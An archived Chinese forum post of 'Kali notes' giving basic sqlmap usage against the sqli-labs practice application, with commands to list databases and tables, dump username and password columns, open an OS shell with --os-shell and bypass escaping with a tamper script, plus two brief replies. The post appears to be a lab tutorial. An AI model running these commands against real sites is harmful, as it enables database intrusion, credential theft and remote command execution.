SQLmap的基本使用方法-Kali笔记 - Powered by Discuz! Archiver

zhen 发表于 2021-1-22 22:34:55

SQLmap的基本使用方法

# 确定注入点后测试
```
sqlmap -u http://localhost/sqli/Less-1/?id=1
```
![](data/attachment/forum/202101/22/223414s3md3bz3didi5uud.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "src=http%3A%2F%2F08.imgmini.eastday.com%2Fmobile%2F20180605%2F20180605171308_353.jpg")
# 当前数据库
```
sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --current-db
```
### 其他数据库

`--dbs`
```
sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -dbs
```
### 数据库内表

**-D security --tables**

```
sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security --tables
```

# 表内字段

**-D security -T users --columns**

```
sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users --columns
```

**-D security -T users -C username,password --dump**

```
sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users -C username,password --dump
```

# 注入Shell

```
sqlmap -u http://192.168.2.12/sqli/Less-7/?id=1 --os-shell
```

# 宽字节注入

使用 unmagicquotes 方法进行宽字节绕过
```
sqlmap.py -u http://127.0.0.1/Less-32/?id=1 --tamper "unmagicquotes" --dbs
```

zhen 发表于 2021-1-22 22:38:19

新人发帖，大佬们多支持下！
{:6_237:}

priess1314 发表于 2021-1-23 16:20:12

谢谢分享！！！:shengqi:

页: [1]

Kali笔记's Archiver

SQLmap的基本使用方法